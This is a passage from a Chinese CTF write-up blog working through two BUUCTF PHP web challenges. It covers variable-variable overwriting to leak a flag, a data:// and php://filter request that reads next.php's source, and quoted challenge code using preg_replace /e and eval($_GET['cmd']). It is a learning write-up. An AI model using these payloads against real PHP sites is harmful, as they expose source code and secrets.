<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">    <span class="variable">$$x</span> = <span class="variable">$y</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="string">&#x27;flag&#x27;</span>  || <span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="variable">$is</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​    在这里如果要利用<code>exit($is)</code>就需要使用<code>Post方法</code>且有一项必须为<code>flag=flag</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_POST</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;flag&#x27;</span> =&gt; <span class="string">&#x27;flag&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;is&#x27;</span> =&gt; <span class="string">&#x27;你猜猜我会输出啥？&#x27;</span>,</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">第一次迭代：</span></span><br><span class="line"><span class="comment">$x = flag , $y = flag</span></span><br><span class="line"><span class="comment">$$x= $flag , $y = flag</span></span><br><span class="line"><span class="comment">$flag = flag</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">第二次迭代：</span></span><br><span class="line"><span class="comment">$x = is , $y = 你猜猜我会输出啥？</span></span><br><span class="line"><span class="comment">$$x= $is , $y = 你猜猜我会输出啥？</span></span><br><span class="line"><span class="comment">$is = 你猜猜我会输出啥？</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.qwaut6rp6v.png"></p>
<p>​    既然做不到变量名代替，现在我们来深入思考该怎么实现将flag中的内容赋给is变量呢？<br>​    经过进一步分析发现，利用Post方法只能做到修改一个变量的内容，而不能实现变量名替换从而输出flag，所以这里还是得利用get方法！</p>
<p>​    </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_GET</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;is&#x27;</span> =&gt; <span class="string">&#x27;flag&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;flag&#x27;</span> =&gt; <span class="string">&#x27;flag&#x27;</span></span><br><span class="line">);</span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">第一次迭代：</span></span><br><span class="line"><span class="comment">$x = is , $y = flag</span></span><br><span class="line"><span class="comment">$$x= $is , $$y = $flag</span></span><br><span class="line"><span class="comment">$is = $flag</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">第二次迭代：---&gt;满足if条件</span></span><br><span class="line"><span class="comment">$x = flag , $y = flag</span></span><br><span class="line"><span class="comment">$x = $flag , $y = $flag</span></span><br><span class="line"><span class="comment">$flag = $flag</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.652gus4ywpk0.png"></p>
<h3 id="解法四-利用echo-quot-the-flag-is-quot-flag"><a href="#解法四-利用echo-quot-the-flag-is-quot-flag" class="headerlink" title="解法四: 利用echo &quot;the flag is: &quot;.$flag;"></a>解法四: 利用<code>echo &quot;the flag is: &quot;.$flag;</code></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?1=flag&amp;flag=1</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.75pvw2b63ec0.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_GET</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;1&#x27;</span> =&gt; <span class="string">&#x27;flag&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;flag&#x27;</span> =&gt; <span class="string">&#x27;1&#x27;</span></span><br><span class="line">);</span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">第一次迭代：</span></span><br><span class="line"><span class="comment">$x = 1 , $y = flag</span></span><br><span class="line"><span class="comment">$$x= $1 , $$y = $flag</span></span><br><span class="line"><span class="comment">$1 = $flag</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">第二次迭代：---&gt;满足if条件</span></span><br><span class="line"><span class="comment">$x = flag , $y = 1</span></span><br><span class="line"><span class="comment">$x = $flag , $y = $1</span></span><br><span class="line"><span class="comment">$flag = $1</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//	是如何绕过这个函数的呢？</span></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">    <span class="comment">//遍历$_GET数组中的键值对，检查如果GET参数flag的值等于某个键名，并且该键名不等于&quot;flag&quot;本身</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="variable">$x</span> &amp;&amp; <span class="variable">$x</span> !== <span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">exit</span>(<span class="variable">$handsome</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$_GET</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;1&#x27;</span> =&gt; <span class="string">&#x27;flag&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;flag&#x27;</span> =&gt; <span class="string">&#x27;1&#x27;</span></span><br><span class="line">);</span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">第一次迭代：</span></span><br><span class="line"><span class="comment">$x = 1 , $y = flag</span></span><br><span class="line"><span class="comment">$_GET[&#x27;flag&#x27;] = 1</span></span><br><span class="line"><span class="comment">这里的$x的类型是string，而$_GET[&#x27;flag&#x27;]的值的类型是int，故不完全相等从而绕过,并且flag变量的内容没有被修改过！</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">......</span></span><br><span class="line"><span class="comment">最后成功</span></span><br><span class="line"><span class="comment">echo &quot;the flag is: &quot;.$flag;</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="易错总结："><a href="#易错总结：" class="headerlink" title="易错总结："></a>易错总结：</h3><ol>
<li><p><code>$x</code>与<code>$_GET[X]</code>要分辨清楚！</p>
</li>
<li><p>URL请求中的问号问题：<img lazyload alt="image" data-src="D:\Typora\typora-user-images\image-20230526193753213.png"></p>
</li>
</ol>
<h2 id="0x3-BJDCTF2020-ZJCTF，不过如此"><a href="#0x3-BJDCTF2020-ZJCTF，不过如此" class="headerlink" title="0x3:[BJDCTF2020]ZJCTF，不过如此"></a>0x3:[BJDCTF2020]ZJCTF，不过如此</h2><h3 id="初探题目-1"><a href="#初探题目-1" class="headerlink" title="初探题目"></a>初探题目</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">&quot;text&quot;</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;I have a dream&quot;</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>).<span class="string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Not now!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$file</span>);  <span class="comment">//next.php</span></span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>​    我在思考如何绕过<code>file_get_contents($text,&#39;r&#39;)===&quot;I have a dream&quot;</code>,因为我不知道哪个路径下的文件它的内容是<code>I have a dream</code></p>
<hr>
<p>​    今日内容到这里~~</p>
<p>​    但求坚持！</p>
<hr>
<p>​    </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url/?text=data://text/plain,I have a dream&amp;file=php://filter/read=convert.base64-encode/resource=next.php</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230527/St2iv8rimage.5lb2d8e0ntw0.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data://text/plain,I have a dream</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/read=convert.base64-encode/resource=</span><br></pre></td></tr></table></figure>



<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$id</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;id&#x27;</span>] = <span class="variable">$id</span>;<span class="comment">//目的是为了在会话中保留 $id 值，以备后续的操作使用。</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">complex</span>(<span class="params"><span class="variable">$re</span>, <span class="variable">$str</span></span>) </span>&#123;<span class="comment">//re:regular expression</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">preg_replace</span>(</span><br><span class="line">        <span class="string">&#x27;/(&#x27;</span> . <span class="variable">$re</span> . <span class="string">&#x27;)/ei&#x27;</span>,</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">一、&#x27;/&#x27; 是正则表达式的分隔符，&quot;()&quot; 表示捕获分组</span></span><br><span class="line"><span class="comment">二、ei 是修饰符，其中 e 表示替换字符串作为 PHP 代码进行执行，i 表示匹配不区分大小写。</span></span><br><span class="line"><span class="comment">字符串连接运算符&#x27;.&#x27;将字符串 &#x27;(&#x27; $re 和 &#x27;)&#x27; 连接在一起，形成一个完整的正则表达式模式。</span></span><br><span class="line"><span class="comment">如果 $re 的值是 &#x27;abc&#x27;，那么字符串连接运算符将产生 &#x27;(abc)&#x27;</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">        <span class="string">&#x27;strtolower(&quot;\\1&quot;)&#x27;</span>,</span><br><span class="line">        <span class="variable">$str</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$re</span> =&gt; <span class="variable">$str</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">complex</span>(<span class="variable">$re</span>, <span class="variable">$str</span>). <span class="string">&quot;\n&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">	@<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>补充知识：</p>
<ol>
<li><p>在正则表达式中，括号具有特殊的含义，并用于多种目的。以下是常见的括号用法：</p>
<p>​    捕获组 <code>( )</code>：括号可以用于创建捕获组，将匹配的子字符串提取出来以供后续引用或处理。</p>
<p>​        例如，正则表达式 <code>(abc)+</code> 中的 <code>(abc)</code> 是一个捕获组，表示匹配连续出现的 “abc” 子字符串。</p>
<p>​    非捕获组 <code>(?: )</code>：括号前加上 <code>?:</code>，可以创建非捕获组，用于匹配但不捕获匹配的内容。</p>
<p>​        例如，正则表达式 <code>(?:abc)+</code> 中的 <code>(?:abc)</code> 是一个非捕获组，表示匹配连续出现的 “abc” 子字符串，但        不捕获它们。</p>
<p>​    分组和顺序 <code>( )</code>：括号可以用于分组和确定匹配的顺序。</p>
<p>​        例如，正则表达式 <code>(abc|def)</code> 表示匹配 “abc” 或 “def”。</p>
</li>
<li><p><code>(abc)+</code> 表示匹配连续出现的 “abc” 子字符串，其中括号 <code>(abc)</code> 表示捕获组，<code>+</code> 表示前面的捕获组可以出现一次或多次。</p>
<p>​    例如，该正则表达式可以匹配 “abc”、”abcabc”、”abcabcabc” 等连续出现多次的 “abc” 子字符串。</p>
<p>​    <strong>不会匹配单个的 “abc”</strong>，因为 <code>+</code> 要求前面的元素至少出现一次。</p>
</li>
<li><p><code>strtolower(&quot;\\1&quot;)</code> 是一个 PHP 的函数调用，用于将字符串转换为小写字母形式。</p>
<ul>
<li><code>strtolower()</code> 是一个 PHP 内置函数，用于<strong>将字符串转换为小写字母形式</strong>。</li>
<li><code>\\1</code> 是一个转义序列，表示要引用正则表达式中第一个捕获组的匹配结果。</li>
<li>在这个表达式中，<code>strtolower(&quot;\\1&quot;)</code> 的作用是将正则表达式中第一个捕获组的匹配结果转换为小写字母形式。</li>
</ul>
</li>
</ol>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li>
            <span class="type">本文标题</span>：<span class="content">DASBOOK-Web</span>
        </li>
        <li>
            <span class="type">本文作者</span>：<span class="content">二十八华生</span>
        </li>
        <li>
            <span class="type">创建时间</span>：<span class="content">2023-05-26 11:04:42</span>
        </li>
        <li class="post-link">
            <span class="type">本文链接</span>：<span class="content">2023/05/26/DASBOOK/</span>
        </li>
        <li>
            <span class="type">版权声明</span>：<span class="content">本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！</span>
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/BUU%E5%88%B7%E9%A2%98/">#BUU刷题</a>&nbsp;
                        </li>
                    
                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/2023/07/05/sqli-lab-%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E7%AF%87/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item">sqli-lab(手工注入篇)</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                               rel="next"
                               href="/2023/05/02/0_PWN/Heap%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/"
                            >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">Heap刷题记录</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                                <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                            </a>
                        </div>
                    
                </div>
            

            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x0-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Http"><span class="nav-text">0x0:[极客大挑战 2019]Http</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x1-BUU-BURP-COURSE-1"><span class="nav-text">0x1.BUU BURP COURSE 1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x2-BJDCTF2020-Mark-loves-cat"><span class="nav-text">0x2: [BJDCTF2020]Mark loves cat</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%9D%E6%8E%A2%E9%A2%98%E7%9B%AE"><span class="nav-text">初探题目</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90"><span class="nav-text">源码分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AF%AD%E6%B3%95%E8%A1%A5%E5%85%85%EF%BC%9A-x%E4%B8%8E-x%E7%9A%84%E5%85%B3%E7%B3%BB%EF%BC%9A"><span class="nav-text">语法补充：$x与$$x的关系：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80%EF%BC%9A%E5%88%A9%E7%94%A8exit-handsome"><span class="nav-text">解法一：利用exit($handsome)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C%EF%BC%9A%E5%88%A9%E7%94%A8exit-yds"><span class="nav-text">解法二：利用exit($yds)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%89%EF%BC%9A%E5%88%A9%E7%94%A8exit-is"><span class="nav-text">解法三：利用exit($is)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E5%9B%9B-%E5%88%A9%E7%94%A8echo-quot-the-flag-is-quot-flag"><span class="nav-text">解法四: 利用echo &quot;the flag is: &quot;.$flag;</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%98%93%E9%94%99%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="nav-text">易错总结：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x3-BJDCTF2020-ZJCTF%EF%BC%8C%E4%B8%8D%E8%BF%87%E5%A6%82%E6%AD%A4"><span class="nav-text">0x3:[BJDCTF2020]ZJCTF，不过如此</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%9D%E6%8E%A2%E9%A2%98%E7%9B%AE-1"><span class="nav-text">初探题目</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2023</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">二十八华生</a>
            
        </div>
        
            <script async data-pjax
                    src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                
                    总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.5.2</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/code-block.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/lazyload.js"></script>


<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/toc.js"></script>
        
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
